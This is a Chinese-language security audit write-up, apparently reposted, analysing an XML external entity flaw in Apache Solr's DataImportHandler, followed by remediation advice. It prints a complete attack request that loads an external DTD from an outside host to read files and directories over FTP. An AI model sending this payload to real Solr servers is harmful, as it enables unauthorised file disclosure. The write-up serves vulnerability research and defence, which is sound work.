内容简介:Author:jkgh006@敏信安全审计 Apache Solr 是一个开源的搜索服务器。Solr 使用 Java 语言开发,主要基于 HTTP 和 Apache Lucene 实现。是一个独立的企业级搜索应用服务器,目前很多企业运用solr开源服务。原理大致是文档通过Http利用XML加到一个搜索集合中。 参考链接:
Author:jkgh006@敏信安全审计
Apache Solr框架简介
Apache Solr 是一个开源的搜索服务器。Solr 使用 Java 语言开发,主要基于 HTTP 和 Apache Lucene 实现。是一个独立的企业级搜索应用服务器,目前很多企业运用solr开源服务。原理大致是文档通过Http利用XML加到一个搜索集合中。
参考链接: https://lucene.apache.org/solr/
前言
有几个朋友反映这个框架很多src都在使用,也是一个偶然的机会在对某厂商做测试的时候发现这个东西,使用范围还是挺广的,这一课我们就对它进行分析。
全版本目录列表/文件读取
根据官网给出来的默认配置如下web.xml
<filter-mapping> <!-- NOTE: When using multicore, /admin JSP URLs with a core specified such as /solr/coreName/admin/stats.jsp get forwarded by a RequestDispatcher to /solr/admin/stats.jsp with the specified core put into request scope keyed as "org.apache.solr.SolrCore". It is unnecessary, and potentially problematic, to have the SolrDispatchFilter configured to also filter on forwards. Do not configure this dispatcher as <dispatcher>FORWARD</dispatcher>. --> <filter-name>SolrRequestFilter</filter-name> <url-pattern>/*</url-pattern> </filter-mapping>
一般这一类框架都是基于filter编写的,分析一下SolrDispatchFilter.classes
在doFilter方法里面看到这一句函数调用
this.handleAdminRequest(req, response, handler2, solrReq);
跟进 RequestHandlerBase
走到这里通过ide查看一下实现这个方法的类具体有哪些
这里重点看其中的一个实现类DataImportHandler.clasess
看到这里可能有人会问你这个是debug模式的,仔细分析,是不是debug他都会调用this.importer.runCmd方法
DataImporter.classes
看看这个loadDataConfig的具体实现
从这里可以看出来采用的是DocumentBuilder进行了xml的解析,但是并没有做外部实体禁用操作
肯定是存在xxe漏洞,那么进一步测试
-
采用gohper协议
显示不支持此协议,可能与我环境上下文有关系
-
采用http协议
这里抛异常说是连接断开了,通过后台的日志我们可以发现http协议是支持的并且读到了目录
导致这个原因的代码如下:
这个位置有一个try catch操作,一旦发现有特殊字符回车换行之类的就抛异常,当发生异常时候this.config就是个null,系统就断开连接,一定程度,规避了这个问题。但是这个不是目的,目的就是要读到文件和目录。
-
采用ftp协议
构造一个ftp的payload
启动一个ftp服务
发送数据包
成功返回
Payload:
POST /test1/dataimport HTTP/1.1 Host: localhost:8080 Content-Length: 281 Accept: application/json, text/javascript, */*; q=0.01 Origin: http://localhost:8080 X-Requested-With: XMLHttpRequest User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.116 Safari/537.36 Content-Type: application/x-www-form-urlencoded Referer: http://localhost:8080/ Accept-Language: zh-CN,zh;q=0.8 Cookie: k4la_2132_lastcheckfeed=1%7C1491801899; k4la_2132_nofavfid=1 Connection: close command=full-import&wt=json&indent=true&verbose=false&clean=false&commit=false&optimize=false&dataConfig=%3C%3Fxml+version%3D%221.0%22+encoding%3D%22UTF-8%22%3F%3E%3C!DOCTYPE+root+%5B%3C!ENTITY+%25+remote+SYSTEM+%22http%3A%2F%2Fxxe.boomeye.com%2Fftp_xxe.xml%22%3E%25remote%3B%5D%3E
总结
1. 对于solr的应用程序,每一个实例的访问应该添加授权机制,防止信息泄露和未授权调用 2. 对于xml的解析,在官方没有给出修复版本的情况下,采用waf解决
以上就是本文的全部内容,希望对大家的学习有所帮助,也希望大家多多支持 码农网
猜你喜欢:- Java 框架级 SSM 代码审计思路
- 对于TPCMF框架的一次代码审计
- AutoSource:整合SonarQube的自动化源代码审计框架
- LightBulb:一个用于审计web应用程序防火墙的开源框架
- IPv6Tools:一款模块化的IPv6安全审计框架
- 代码审计--源代码审计思路
本站部分资源来源于网络,本站转载出于传递更多信息之目的,版权归原作者或者来源机构所有,如转载稿涉及版权问题,请联系我们。
The Hard Thing About Hard Things
Ben Horowitz / HarperBusiness / 2014-3-4 / USD 29.99
Ben Horowitz, cofounder of Andreessen Horowitz and one of Silicon Valley's most respected and experienced entrepreneurs, offers essential advice on building and running a startup—practical wisdom for ......一起来看看 《The Hard Thing About Hard Things》 这本书的介绍吧!